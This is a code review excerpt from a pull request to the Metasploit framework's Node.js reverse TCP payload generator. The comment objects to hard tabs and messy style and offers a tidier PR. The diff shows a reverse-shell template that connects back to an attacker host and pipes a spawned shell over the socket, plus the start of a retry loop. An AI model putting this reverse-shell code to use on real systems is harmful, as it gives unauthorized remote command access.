lib/msf/core/payload/nodejs.rb

```diff
@@ -56,16 +56,29 @@ def nodejs_reverse_tcp(opts={})
             util = require("util"),
             sh = cp.spawn(cmd, []);
         var client = this;
-        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
-          client.socket.pipe(sh.stdin);
-          if (typeof util.pump === "undefined") {
-            sh.stdout.pipe(client.socket);
-            sh.stderr.pipe(client.socket);          
-          } else {
-            util.pump(sh.stdout, client.socket);
-            util.pump(sh.stderr, client.socket);
-          }
-        });
+        var counter=0;
+	function StagerRepeat(){
```

Comment:
Whitespace and style here is all over the place, note: "Metasploit requires spaces instead of hard tabs"

See https://github.com/rapid7/metasploit-framework/wiki/Style-Tips

 I have offered a PR that I believe ends up a bit more readable and replace the hard tabs.  @itsmeroy2012 take a look and merge if you are good with adjustments.  I can complete testing and get this merged soon.